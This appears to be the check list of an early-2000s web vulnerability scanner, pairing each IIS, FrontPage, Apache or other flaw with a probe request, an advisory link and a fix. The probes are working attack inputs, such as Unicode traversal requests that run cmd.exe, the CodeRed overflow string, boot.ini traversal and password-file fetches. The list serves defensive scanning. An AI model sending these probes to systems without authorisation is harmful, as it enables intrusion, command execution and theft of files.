Use default Scans
Use SSL (https), works on ANY port
Show FIX with results
Force scan ALL vulns regardless of server version returned
Show last-modified date when matches are found
Verbose output
Debug Level:
Host List Syntax:
a.b.c.d/n - 10.0.0.1/25
a.b.c.* - 10.0.0.* (0-255) same as /24
a.b.c.d/w.x.y.z - 10.0.0.0/255.255.224.0 (standard format)
a.b.c.d/w.x.y.z - 10.0.0.0/0.0.16.255 (cisco format)
a.b.c.d-z - 10.1.2.0-12
a.b.c-x.* - 10.0.0-3.* (last octet has to be * or 0)
a.b.c-x.d - 10.0.0-3.0
hostname - www.unspecific.com
/30 255.255.255.252 4 IPs
/29 255.255.255.248 8 IPs
/28 255.255.255.240 16 IPs
/27 255.255.255.224 32 IPs
/26 255.255.255.192 64 IPs
/25 255.255.255.128 128 IPs
/24 255.255.255.0 256 IPs
/23 255.255.254.0 512 IPs
/22 255.255.252.0 1024 IPs
/21 255.255.248.0 2048 IPs
/20 255.255.240.0 4096 IPs
/19 255.255.224.0 8192 IPs
/18 255.255.192.0 16384 IPs
/17 255.255.128.0 32768 IPs
/16 255.255.0.0 65536 IPs
Default scans include:
.printer Info Leakage
RAW GET /qwertypoiu.printer HTTP/1.0
Microsoft-IIS
UNKNOWN Severity
Remove mapping for .printer
/_vti_bin/shtml.dll file access
GET _vti_bin/shtml.dll
Microsoft-IIS
UNKNOWN Severity
Uninstall MSFP, delete /_vti_bin/shtml.dll and/or remove virtual mapping for _vti_bin
/_vti_bin/shtml.dll path disclosure
GET /_vti_bin/shtml.dll/asdfghjkl
Microsoft-IIS
UNKNOWN Severity
http://online.securityfocus.com/bid/1174/discussion/
Remove FrontPage or File
/_vti_bin/shtml.exe path disclosure
GET /_vti_bin/shtml.exe/qwertyuiop
Microsoft-IIS
UNKNOWN Severity
http://online.securityfocus.com/bid/1174/discussion/
Remove FrontPage or File
A1Stats a1disp.cgi
GET /cgi-bin/a1stats/a1disp.cgi
Multiple Versions Affected
UNKNOWN Severity
http://online.securityfocus.com/archive/1/183028/2001-05-05/2001-05-11/0
CSS 404 Hole
RAW GET /ajfhasdfgsagfakjhgd HTTP/1.0
Microsoft-IIS
UNKNOWN Severity
http://www.microsoft.com/technet/security/bulletin/MS02-018.asp
Install Rollup Patch from MS02-018
CodeRed / IDA / idq.dll
GET x.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=X
Microsoft-IIS
UNKNOWN Severity
http://www.microsoft.com/technet/security/bulletin/MS01-033.asp
PATCH with MS01-033
ColdFusion Admin startstop.html
GET CFIDE/Administrator/startstop.html
Multiple Versions Affected
UNKNOWN Severity
Delete the startstop.html
FrontPage extension dvwssr.dll
GET _vti_bin/_vti_aut/dvwssr.dll
Microsoft-IIS
UNKNOWN Severity
http://www.wiretrip.net/rfp/p/doc.asp?id=45&iface=1
Uninstall FP or delete the file
FrontPage extension htimage.exe
GET cgi-bin/htimage.exe?2,2
Microsoft-IIS
UNKNOWN Severity
FrontPage extension imagemap.exe
GET cgi-bin/imagemap.exe?2,2
Microsoft-IIS
UNKNOWN Severity
FrontPage extension shtml.exe
GET _vti_pvt/shtml.exe
Microsoft-IIS
UNKNOWN Severity
HTTP DELETE allowed
DELETE HACKED.txt
Multiple Versions Affected
UNKNOWN Severity
http://www.w3c.org/Protocols/rfc2616/rfc2616-sec9.html
Disable DELETE in the options of the web server
HTTP PUT allowed
PUT HACKED.txt
Multiple Versions Affected
UNKNOWN Severity
http://www.w3c.org/Protocols/rfc2616/rfc2616-sec9.html
Disable PUT for all directories in the web server
IIS Index Server null.htw
GET null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
Microsoft-IIS
UNKNOWN Severity
http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
Patch It
IIS ViewCode SiteServer Inspired
GET Sites/Knowledge/Membership/Inspired/ViewCode.asp
Microsoft-IIS
UNKNOWN Severity
Delete the file Sites/Knowledge/Membership/Inspired/ViewCode.asp
IIS ViewCode SiteServer Inspiredtutorial
GET Sites/Knowledge/Membership/Inspiredtutorial/Viewcode.asp
Microsoft-IIS
UNKNOWN Severity
Delete the files
IIS ViewCode SiteServer Publishing
GET SiteServer/Publishing/viewcode.asp
Microsoft-IIS
UNKNOWN Severity
Delete the files
IIS ViewCode SiteServer Push
GET Sites/Samples/Knowledge/Push/ViewCode.asp
Microsoft-IIS
UNKNOWN Severity
Delete the files
IIS ViewCode SiteServer Samples Inspired
GET Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
Microsoft-IIS
UNKNOWN Severity
Delete the files
IIS ViewCode SiteServer Samples Inspiredtutorial
GET Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
Microsoft-IIS
UNKNOWN Severity
Delete the files
IIS ViewCode SiteServer Search
GET Sites/Samples/Knowledge/Search/ViewCode.asp
Microsoft-IIS
UNKNOWN Severity
Delete the files
IIS acdg.htr mapping _AuthChangeUrl?
GET _AuthChangeUrl?
Microsoft-IIS
UNKNOWN Severity
http://support.microsoft.com/support/kb/articles/Q282/0/62.ASP
Remove IISADMPWD from the IIS Admin MMC
IIS counter d.o.s. fpcount.exe
GET scripts/fpcount.exe
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/bid/2252
IIS password brute iisadmpwd/achg.htr
GET iisadmpwd/achg.htr
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515
Remove IISADMPWD from the IIS Admin MMC
IIS password brute iisadmpwd/aexp.htr
GET iisadmpwd/aexp.htr
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515
Remove IISADMPWD from the IIS Admin MMC
IIS password brute iisadmpwd/aexp2.htr
GET iisadmpwd/aexp2.htr
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515
Remove IISADMPWD from the IIS Admin MMC
IIS password brute iisadmpwd/aexp2b.htr
GET iisadmpwd/aexp2b.htr
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515
Remove IISADMPWD from the IIS Admin MMC
IIS password brute iisadmpwd/aexp3.htr
GET iisadmpwd/aexp3.htr
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515
Remove IISADMPWD from the IIS Admin MMC
IIS password brute iisadmpwd/aexp4.htr
GET iisadmpwd/aexp4.htr
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515
Remove IISADMPWD from the IIS Admin MMC
IIS password brute iisadmpwd/aexp4b.htr
GET iisadmpwd/aexp4b.htr
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515
Remove IISADMPWD from the IIS Admin MMC
IIS password brute iisadmpwd/anot.htr
GET iisadmpwd/anot.htr
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515
Remove IISADMPWD from the IIS Admin MMC
IIS password brute iisadmpwd/anot3.htr
GET iisadmpwd/anot3.htr
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515
Remove IISADMPWD from the IIS Admin MMC
IIS remote file creation scripts/tools/getdrvs.exe
GET scripts/tools/getdrvs.exe
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/bid/1818
IIS remote file creation scripts/tools/newdsn.exe
GET scripts/tools/newdsn.exe
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/bid/1818
Remove newdsn.exe from the tools directory
IIS remote file creation tools/newdsn.exe
GET tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2goatfart.html&newdb=CREATE_DB&attr=
Microsoft-IIS/3
UNKNOWN Severity
http://www.securityfocus.com/bid/1818
Remove newdsn.exe from the tools directory
IISSamples / Code.asp
GET iissamples/exair/howitworks/Code.asp
Microsoft-IIS
UNKNOWN Severity
http://www.atstake.com/research/advisories/1999/showcode.txt
Remove IISSAMPLES from IIS Admin MMC
IISSamples / Codebrw1.asp
GET iissamples/exair/howitworks/Codebrw1.asp
Microsoft-IIS
UNKNOWN Severity
http://www.atstake.com/research/advisories/1999/showcode.txt
Remove IISSAMPLES from IIS Admin MMC
IISSamples / Codebrws.asp
GET iissamples/exair/howitworks/Codebrws.asp
Microsoft-IIS
UNKNOWN Severity
http://www.atstake.com/research/advisories/1999/showcode.txt
Remove IISSAMPLES from IIS Admin MMC
IISSamples / sdk / CodeBrws.asp
GET iissamples/sdk/asp/docs/CodeBrws.asp
Microsoft-IIS
UNKNOWN Severity
http://www.atstake.com/research/advisories/1999/showcode.txt
Remove IISSAMPLES from IIS Admin MMC
IISSamples / sdk / codebrw2.asp
GET iissamples/sdk/asp/docs/codebrw2.asp
Microsoft-IIS
UNKNOWN Severity
http://www.atstake.com/research/advisories/1999/showcode.txt
Remove IISSAMPLES from IIS Admin MMC
IISSamples / sdk / codebrws.asp
GET iissamples/sdk/asp/docs/codebrws.asp
Microsoft-IIS
UNKNOWN Severity
http://www.atstake.com/research/advisories/1999/showcode.txt
Remove IISSAMPLES from IIS Admin MMC
Infected CodeRed & VULN /msadc/root.exe
GET msdac/root.exe?/c+dir
Microsoft-IIS
UNKNOWN Severity
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
REBUILD THE BOX
Infected CodeRed & VULN /scripts/root.exe
GET scripts/root.exe?/c+dir
Microsoft-IIS
UNKNOWN Severity
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
REBUILD THE BOX
Infected with Nimda /readme.eml
GET /
Microsoft-IIS
UNKNOWN Severity
http://www.sarc.com/avcenter/venc/data/w32.nimda.a@mm.html
REBUILD THE BOX
JRUN WEB-INF Access
GET WEB-INF/web.xml
JRun
UNKNOWN Severity
http://www.foundstone.com/knowledge/randd-advisories-display.html?id=231
Lotus notes domcfg.nsf
GET domcfg.nsf/?open
Lotus
UNKNOWN Severity
MSADC / showcode.asp
GET msadc/Samples/selector/showcode.asp
Microsoft-IIS
UNKNOWN Severity
http://www.atstake.com/research/advisories/1999/showcode.txt
Remove MSADC from IIS Admin MMC
MSFP passwd file administrator.pwd
GET _vti_pvt/administrator.pwd
Microsoft-IIS
UNKNOWN Severity
MSFP passwd file administrators.pwd
GET _vti_pvt/administrators.pwd
Microsoft-IIS
UNKNOWN Severity
MSFP passwd file authors.pwd
GET _vti_pvt/authors.pwd
Microsoft-IIS
UNKNOWN Severity
MSFP passwd file service.pwd
GET _vti_pvt/service.pwd
Microsoft-IIS
UNKNOWN Severity
MSFP passwd file users.pwd
GET _vti_pvt/users.pwd
Microsoft-IIS
UNKNOWN Severity
Netscape DOS
GET publisher
Netscape
UNKNOWN Severity
http://www.kb.cert.org/vuls/id/191763
Open Proxy
Proxy http://www.unspecific.com/proxy.test
Multiple Versions Affected
UNKNOWN Severity
Turn off Proxy or restrict to specific addresses
PHP File Upload Overflow ver <= 4.2.0
GET /
PHP
UNKNOWN Severity
Remote cmd exec (via SQL) ASPSamp
GET ASPSamp/AdvWorks/equipment/catalog_type.asp
Microsoft-IIS
UNKNOWN Severity
Delete ASPSamp sample directory
Remote cmd exec (via SQL) AdvWorks sample files
GET AdvWorks/equipment/catalog_type.asp
Microsoft-IIS
UNKNOWN Severity
Delete the AdvWorks sample directory
Running PHP-Nuke
GET index.php
Multiple Versions Affected
UNKNOWN Severity
http://www.securityfocus.com/cgi-bin/vulns.pl?section=keyword&keyword=PHP
Running vulnerable Apache
GET /
Apache
UNKNOWN Severity
Running vulnerable thttpd
GET /
thttpd
UNKNOWN Severity
SMTP Admin
GET Mail/smtp/Admin/smadv.asp
Microsoft-IIS
UNKNOWN Severity
Remove mapping for Mail/SMTP/Admin
SQL Samples /clocktower
GET clocktower
Microsoft-IIS
UNKNOWN Severity
SQL Samples /market
GET market
Microsoft-IIS
UNKNOWN Severity
SQL Samples /mspress30
GET mspress30
Microsoft-IIS
UNKNOWN Severity
SQL Samples /vc30
GET vc30
Microsoft-IIS
UNKNOWN Severity
Site Server DSN w/LDAP anon user
GET SiteServer/Admin/commerce/foundation/DSN.asp
Microsoft-IIS
UNKNOWN Severity
http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm
Remove Pages
Site Server GroupManager w/LDAP anon user
GET Admin/knowledge/dsmgr/users/GroupManager.asp
Microsoft-IIS
UNKNOWN Severity
http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm
Remove Pages
Site Server Publishing Users w/LDAP anon user
PUT Sites/Publishing/Users/
Microsoft-IIS
UNKNOWN Severity
http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm
Remove Pages
Site Server UserManager w/LDAP anon user
GET Admin/knowledge/dsmgr/users/UserManager.asp
Microsoft-IIS
UNKNOWN Severity
http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm
Remove Pages
Site Server View Source
GET siteserver/publishing/viewcode.asp
Microsoft-IIS
UNKNOWN Severity
Site Server autoconfig w/LDAP anon user
GET _mem_bin/autoconfig.asp
Microsoft-IIS
UNKNOWN Severity
http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm
Remove Pages
Site Server driver w/LDAP anon user
GET SiteServer/Admin/commerce/foundation/driver.asp
Microsoft-IIS
UNKNOWN Severity
http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm
Remove Pages
Site Server dsmgr w/LDAP anon user
GET SiteServer/Admin/knowledge/dsmgr/default.asp
Microsoft-IIS
UNKNOWN Severity
http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm
Remove Pages
Site Server findserver w/LDAP anon user
GET SiteServer/admin/findvserver.asp
Microsoft-IIS
UNKNOWN Severity
http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm
Remove Pages
Site Server formslogin w/LDAP anon user
GET _mem_bin/formslogin.asp
Microsoft-IIS
UNKNOWN Severity
http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm
Remove Pages
SiteServer Admin
GET SiteServer/Admin
Microsoft-IIS
UNKNOWN Severity
SiteServer Publishing
PUT Sites/Publishing/Users/
Microsoft-IIS
UNKNOWN Severity
UniCode Exploit from / %255c
GET ..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
Microsoft-IIS
HIGH
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
PATCH
UniCode Exploit from /_mem_bin %255c
GET _mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
Microsoft-IIS
HIGH
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
PATCH - MS00-078
UniCode Exploit from /_vti_bin %255c
GET _vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
Microsoft-IIS
HIGH
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
PATCH
UniCode Exploit from /cfide %255c
GET cfide/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
Microsoft-IIS
HIGH
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
PATCH - MS00-078
UniCode Exploit from /msadc %255c
GET msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
Microsoft-IIS
HIGH
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
PATCH
UniCode Exploit from /scripts %255c
GET scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
Microsoft-IIS
HIGH
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
PATCH
UniCode Exploit from /scripts %c0%af..%c0%af
GET scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\\
Microsoft-IIS
HIGH
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
PATCH
UniCode Exploit from /scripts %c0%af../
GET scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\
Microsoft-IIS
HIGH
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
PATCH
_vti_bin/fpcount.exe Buffer Overflow
GET _vti_bin/fpcount.exe?Page=default.asp|Image=3
Microsoft-IIS
UNKNOWN Severity
Uninstall MSFP, delete /_vti_bin/shtml.dll and/or remove virtual mapping for _vti_bin
fp30reg.dll Buffer Overflow
RAW GET /_vti_bin/_vti_aut/fp30reg.dll?1234=X HTTP/1.0
Microsoft-IIS
UNKNOWN Severity
Uninstall MSFP, delete /_vti_bin/shtml.dll and/or remove virtual mapping for _vti_bin
fp30reg.dll CSS
GET /_vti_bin/_vti_aut/fp30reg.dll
Microsoft-IIS
UNKNOWN Severity
iPlanet and Netscape file viewing
GET search?NS-query-pat=..\..\..\..\..\boot.ini
Multiple Versions Affected
UNKNOWN Severity
Turn off the search engine (it is off by default on 6.0) until a fix is provided.
mod_blowchunks vulnerability
RAW GET /checkapache.html HTTP/1.0
Transfer-Encoding: chunked
999999999;
a
0
Multiple Versions Affected
UNKNOWN Severity
Update Apache
msadc.dll vuln
POST msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName
Microsoft-IIS
UNKNOWN Severity
Remove MSADC from IIS Admin MMC
webhits.dll arbitrary file access
GET qwertypoiu.htw
Microsoft-IIS
UNKNOWN Severity
Remove mapping for .htw